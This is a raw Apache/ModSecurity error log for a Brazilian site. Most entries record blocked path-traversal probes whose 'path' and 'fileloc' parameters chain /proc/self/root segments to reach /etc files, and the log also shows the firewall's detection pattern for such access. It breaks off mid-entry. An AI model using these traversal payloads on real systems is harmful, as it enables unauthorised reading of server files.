[Fri Mar 20 09:31:48.711300 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:59164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-NOoXxyEfFpUF8f-UDQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:50.013266 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.241.31:59180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-Nl1pVZ5mVmJwsFNEFQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:50.224354 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.241.31:59180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-Nl1pVZ5mVmJwsFNEFgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:51.620616 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:59188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-N_HIg5MgXLBnicMKPAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:52.870568 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:59200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-OPqxLDW4GITHUkT8wgAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:55.991673 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:59210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-OwF0L0L-SsrnPo57fgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:57.479091 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:41514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-Pda6ubjKNq_cu4br4AAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:32:00.169676 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:41526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-PhCii7xarUs8iHZ66AAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:32:26.597790 2026] [mime_magic:error] [pid 7235:tid 140411624429312] (70014)End of file found: [client 57.141.18.49:41088] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:32:42.009940 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.81:41412] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:33:47.734868 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.228.61:44044] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0-qwF0L0L-SsrnPo575QAAAsw"]
[Fri Mar 20 09:34:04.063773 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:38176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-vBCii7xarUs8iHZ7TAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:06.222982 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:34994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-vfHIg5MgXLBnicMKowAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:08.772859 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.243.128:34996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-v_XLqtnMIWvjpaKtUwAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:11.358551 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:47110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-wgF0L0L-SsrnPo57-gAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:13.036047 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:47116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-xda6ubjKNq_cu4bsbQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:15.340382 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:47128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-xgF0L0L-SsrnPo58AQAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:35.555703 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:47132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-2_HIg5MgXLBnicMKxwAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:37.917627 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.243.128:44042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-3PqxLDW4GITHUkT9EQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:41.775895 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:44046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-4eoXxyEfFpUF8f-UYQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:43.110221 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:55516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-49a6ubjKNq_cu4bsqwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:44.418751 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:55524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-5BCii7xarUs8iHZ7YgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:45.747185 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:55534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-5V1pVZ5mVmJwsFNEeQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:48.136930 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:55538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 